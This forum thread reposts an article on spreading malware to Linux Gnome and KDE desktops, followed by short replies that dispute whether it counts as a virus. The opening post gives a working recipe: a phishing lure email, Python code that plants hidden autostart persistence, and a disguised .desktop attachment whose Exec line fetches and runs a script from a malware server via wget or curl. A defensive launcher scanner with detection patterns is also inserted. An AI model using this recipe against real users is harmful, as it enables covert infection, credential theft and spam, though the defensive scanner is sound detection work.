How to write a Linux virus in 5 easy steps
Dial-up
Registered User
User ID: 105045
07-10-2012 04:41 AM

Posts: 5,410



Post: #1
How to write a Linux virus in 5 easy steps
Don't save attachments unless from a trusted and secure source. Also, watch out for infected USB sticks. Always reformat those, even new ones not found outside in the parking lot.


Link: Geek Zone
linux, posted: 11-Feb-2009 06:33

I should point out: The vulnerabilities we will be taking advantage of are 'features' of the most popular modern Linux desktop environments, Gnome and KDE. The actual core of Linux itself does not have any of these vulnerabilities. A Linux (or any other *nix) system without running Gnome or KDE will not exhibit any of these problems, which is one of the huge advantages of properly separating the core OS from other applications such as the desktop environment.
[snip]

Getting users to open attachments: Check out these nude shots!

So, the email will have to read something like:

Whoa, check out these nude shots of...!
(if the attachment doesn't want to open just save it to your desktop and open it...)

That would sound suspicious to most of us, but 'most' is not 'all' and user stupidity is everywhere. Besides, many users of web-based email clients are used to the save-first routine anyway.
[snip]

Getting attachments to execute

When you save an email attachment under Linux, the execute flag is normally NOT set and thus, the file can't be executed just by clicking on it. So, no luck?

Not so fast. Modern desktop environments, such as Gnome and KDE, conveniently offer a nice "workaround" called 'launchers'. Those are small files that describe how something should be started. Just a few lines that specify the name, the icon that should be displayed and the actual command to execute. Conveniently, the syntax of those launcher files is the same for Gnome and KDE. And those launchers don't have to have any execute permissions set on them! Desktop environments treat those files as a special case, so when you click on them Gnome or KDE will happily execute the command that was specified within the launcher description and without the need for the execute bit to be set on the launcher itself. Now we are getting somewhere!
[snip]

You don't need to be root to 0wn someone

None of that so far required root privileges. And our script now can do whatever it wishes to do within the confines of the user account. Confined it may be, but that doesn't prevent significant damage from being done.

For example, it can start to pilfer through the user's address book to harvest email addresses, send them off to our malware server, start sending spam email or it can spread itself by email. It can install a Firefox extension that captures passwords as the user types them. It may start to share the user's desktop via VNC without the user's knowledge. It can start a background daemon that pops up ads. Linux adware!
[snip]

Autostart after reboot

Users do not need root privileges in order to configure certain applications for autolaunch when they are logging into their own user sessions. That is because they are only making changes to their own session and user account, not the underlying system settings.
[snip]

Fortunately, the modern desktop environments have their own set of commands which they are autostarting on login. In the case of Gnome, take a look at what you find in ~/.config/autostart (this directory may not exist yet, if you have not configured any apps for autostart). That's right! More launchers! Those are run every time the user logs into Gnome. For KDE it's even simpler: Just link to your executable from within the ~/.kde/Autostart directory.

Our malware then only needs to create an appropriate entry in those directories and it will start to run whenever the user logs in!
[snip]


Compact step-by-step guide

Ok, so here is the summary then, which also fills in a few more specific details:

1. Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.

2. Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.

For example, to create the shortcut for KDE, all you need to write in Python is:

import os
uname = os.getlogin()
drop_dir = "/home/%s/.kde/Autostart" % uname
os.makedirs(drop_dir)
os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir + "/s.py")

For Gnome the Python script instead needs to write a launcher into the proper directory:

import os
relauncher_str = """
[Desktop Entry]
Type=Application
Name=Malware
Exec=python .local/.hidden/s.py
Icon=system-run
"""
uname = os.getlogin()
drop_dir = "/home/%s/.config/autostart" % uname
os.makedirs(drop_dir)
f = open(drop_dir + "/Malware.desktop", "w")
f.write(relauncher_str)
f.close()

Writing these autostart entries is probably some of the first action that your malware should perform.

3. Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this:

[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and choose one of the appropriate standard image icons.

The Exec line is a bit longer now, because we have to account for the possibility that either wget or curl is installed. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent-looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot.

Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.

4. Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as 'some_text.odt' on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.

5. Send this email out to as many email addresses as you can get a hold of.

Voila! A Linux virus in 5 simple steps. Every user that saves and opens the attachment you have sent them will get themselves infected with the malware script of your choice, which is then also restarted whenever the user logs in again.
[snip]

Solutions for the problem

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you.
[snip]
(This post was last modified: 07-10-2012 04:47 AM by Dial-up.)
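As an added example from the defender's side (not part of the forum post or the linked article), the following Python check parses launcher files and walks the two per-user autostart locations the article names, flagging the masquerade pattern it describes: an application launcher whose Name or file name ends in a document or image extension, an Exec line that runs a downloader or an inline shell, and paths into dot-directories. The indicator names and the regular expressions are my own choices, not anything the article defines.

```python
import os
import re

DOC_EXT = re.compile(r"\.(odt|docx?|pdf|jpe?g|png|gif|txt)$", re.I)  # document/image look-alike names
FETCH = re.compile(r"\b(wget|curl|(ba)?sh\s+-c)\b")                  # downloader or inline shell in Exec
HIDDEN = re.compile(r"(?:^|[\s/=])\.[A-Za-z0-9]")                    # a dot-directory inside a path
AUTOSTART_DIRS = (".config/autostart", ".kde/Autostart")            # the two locations the article names

def parse_desktop_entry(text):
    """Minimal parser: key=value pairs inside the [Desktop Entry] group."""
    entry, in_group = {}, False
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def assess_launcher(filename, text):
    """Return the indicators a launcher matches; an empty list means none fired."""
    entry = parse_desktop_entry(text)
    if entry.get("Type") != "Application":
        return []
    exec_line = entry.get("Exec", "")
    stem = filename[:-len(".desktop")] if filename.endswith(".desktop") else filename
    checks = [
        ("name-mimics-document", DOC_EXT.search(entry.get("Name", ""))),
        ("double-extension-filename", DOC_EXT.search(stem)),
        ("exec-downloads-or-shells", FETCH.search(exec_line)),
        ("exec-uses-hidden-path", HIDDEN.search(exec_line)),
    ]
    return [name for name, hit in checks if hit]

def scan_autostart(home):
    """Map each suspicious entry under the user's autostart directories to its indicators."""
    report = {}
    for rel in AUTOSTART_DIRS:
        directory = os.path.join(home, rel)
        for name in (sorted(os.listdir(directory)) if os.path.isdir(directory) else []):
            path = os.path.join(directory, name)
            if os.path.islink(path) and HIDDEN.search(os.readlink(path)):
                report[path] = ["symlink-into-hidden-path"]  # KDE-style link into a dot-directory
            elif name.endswith(".desktop") and os.path.isfile(path):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = assess_launcher(name, fh.read())  # GNOME-style launcher
                if hits:
                    report[path] = hits
    return report
```

Run `scan_autostart(os.path.expanduser("~"))` to review your own session's autostart entries; a launcher that trips several indicators at once is worth a manual look.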

Currahee
We stand alone, together
User ID: 107477
07-10-2012 04:47 AM

Posts: 13,368



Post: #2
RE: How to write a Linux virus in 5 easy steps
What they describe is not a virus. And 5 easy steps? If you got that routine to work 1 out of 10,000 attempts I'd still consider it lucky.




$0.02
Peace

“You don’t want to become so open-minded that the wind can whistle between your ears.” ~Terence McKenna
Dial-up
Registered User
User ID: 105045
07-10-2012 04:50 AM

Posts: 5,410



Post: #3
RE: How to write a Linux virus in 5 easy steps
Currahee  Wrote: (07-10-2012 04:47 AM)
What they describe is not a virus. And 5 easy steps? If you got that routine to work 1 out of 10,000 attempts I'd still consider it lucky.




$0.02
Peace
The author does mention that it is not a virus. You have to go to the link in order to get his detailed explanation.

Yep, it's a real pain to 'infect' a linux machine.
I┴∀NIW∩˥˥Iʞ
NOT A SHEEPLE
User ID: 93317
07-10-2012 04:51 AM

Posts: 15,634



Post: #4
RE: How to write a Linux virus in 5 easy steps
Dial-up  Wrote: (07-10-2012 04:50 AM)
Currahee  Wrote: (07-10-2012 04:47 AM)
What they describe is not a virus. And 5 easy steps? If you got that routine to work 1 out of 10,000 attempts I'd still consider it lucky.




$0.02
Peace
The author does mention that it is not a virus. You have to go to the link in order to get his detailed explanation.

Yep, it's a real pain to 'infect' a linux machine.

why even do it? I mean why mess up a person's computer*
(This post was last modified: 07-10-2012 04:53 AM by I┴∀NIW∩˥˥Iʞ.)
LoP Guest
lop guest
User ID: 107189
07-10-2012 04:52 AM

 



Post: #5
RE: How to write a Linux virus in 5 easy steps
a CPU is a Central Processing Unit.
LoP Guest
lop guest
User ID: 97775
07-10-2012 04:57 AM

 



Post: #6
RE: How to write a Linux virus in 5 easy steps
So basically, this was bs.
Dial-up
Registered User
User ID: 105045
07-10-2012 04:58 AM

Posts: 5,410



Post: #7
RE: How to write a Linux virus in 5 easy steps
ĶĨĽĿŨМľŃǺŢľ  Wrote: (07-10-2012 04:51 AM)
why even do it? I mean why mess up a persons computer*
It's not my cup of tea, but some script kiddies (governments, etc.) like to partake in such nefarious activities.
Dial-up
Registered User
User ID: 105045
07-10-2012 05:00 AM

Posts: 5,410



Post: #8
RE: How to write a Linux virus in 5 easy steps
LoP Guest  Wrote: (07-10-2012 04:57 AM)
So basically, this was bs.
No, just more difficult to compromise a linux machine.
Sonofabiscuit
Registered User
User ID: 105545
07-10-2012 05:01 AM

Posts: 2,738



Post: #9
RE: How to write a Linux virus in 5 easy steps
I'm not sure of the exact definition of a computer virus, but as it mentioned it's capable of self replication and doing a host of nasty stuff to you. Sounds like a virus to me, and calling it malware won't make you feel any better if you end up with it.